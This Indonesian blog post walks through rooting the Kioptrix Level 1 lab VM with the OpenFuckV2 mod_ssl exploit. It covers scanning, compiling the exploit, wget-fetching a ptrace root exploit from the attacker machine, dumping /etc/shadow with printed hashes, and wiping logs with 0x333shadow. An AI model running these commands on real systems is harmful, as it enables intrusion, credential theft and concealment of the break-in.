Tentang e Black Faster V1.1

×

» » (Mod_SSL) Exploit Apache Vuln Translate »

(Mod_SSL) Exploit Apache Vuln

Salam Sahabat PenPus Blog, 
Exploit ini adalah cara memanfaat kan vuln pada openSSL dari apache sehingga kita dapat masuk ke dalam system target

metode
* Scan network for hosts (nmap)
* Scan target for running services (nmap)
* Scan target for running web services (nikto)
* Discover and run exploit (OpenFuckV2)
* Gain root (OpenFuckV2)
* Game Over
* Modify logs (0x333shadow)

hal di butuhkan :

Kioptrix - Level 1 VM. Download here
* VMware player OR workstation. Download here
* nmap – (Can be found on BackTrack 5-R3)
* nikto - (Can be found on BackTrack 5-R3)
* Internet Browser – (Firefox can be found on BackTrack 5-R3)
* A Text Editor – (Kate can be found on BackTrack 5-R3)
* OpenFuckv2.c – (Can be found on exploit-db.com)
* ptrace/kmod local root exploit – (Can be found on securityfocus.com)
* 0x333shadow.tar – (Can be found on packetstormsecurity.org)

Commands :
nmap 192.168.0.0/24 -n -sP -sn
nmap 192.168.0.111 -O -sS -sV -v
clear

cd /pentest/scanners/nikto
./nikto.pl -host 192.168.0.111 -Display 124

Firefox: Search (exploit.db): OpenSSL -> Download
#http://www.exploit-db.com/exploits/764/">http://www.exploit-db.com/exploits/764/

cd ~
gcc 764.c -o exploit -lcrypto
kate 764.c
-> Add: #include <openssl rc4.h>
-> Add: #include <openssl md5.h>
Firefox: Search (Google): ptrace-kmod.c. Download: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c
cp ptrace-kmod.c /var/www/
start-apache
-> Replace: wget 192.168.0.33/ptrace-kmod.c
-> Save
gcc 764.c -o exploit -lcrypto
ls
./exploit
./exploit 0x6b 192.168.0.111 443

uname -a
#cat /etc/*-release
whoami
cat /etc/issue
mail
1
exit

cat /etc/shadow

cd /var/log && grep -r 192.168.0.33 ./
* Firefox: Google -> Search: 0x333shadow.tar.gz. Download: http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/0x333shadow.tar.gz
* tar xvf 0x333shadow.tar.gz
* cd 0x333shadow
* ls
* cp 0x333shadow.c /var/www/rmLogs.c
cd /tmp
wget 192.168.0.33/rmLogs.c
gcc 0x333shadow.c -o rmLogs -D Linux
ls
./rmLogs
./rmLogs -a -i 192.168.0.33 -l 5 && rm -rf *
cd /var/log && grep -r 192.168.0.33 ./
locate .bash_history
cat /home/john/.bash_history
cat /root/.bash_history

uname -a && whoami

#---------------------------------------------------------------------
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::
#---------------------------------------------------------------------

Kalo masih bingung liat aja video nya
Download  disini



Author: - 21.26

1 komentar

  1. Anonim9 April 2013 pukul 07.39

    Komentar ini telah dihapus oleh administrator blog.

    BalasHapus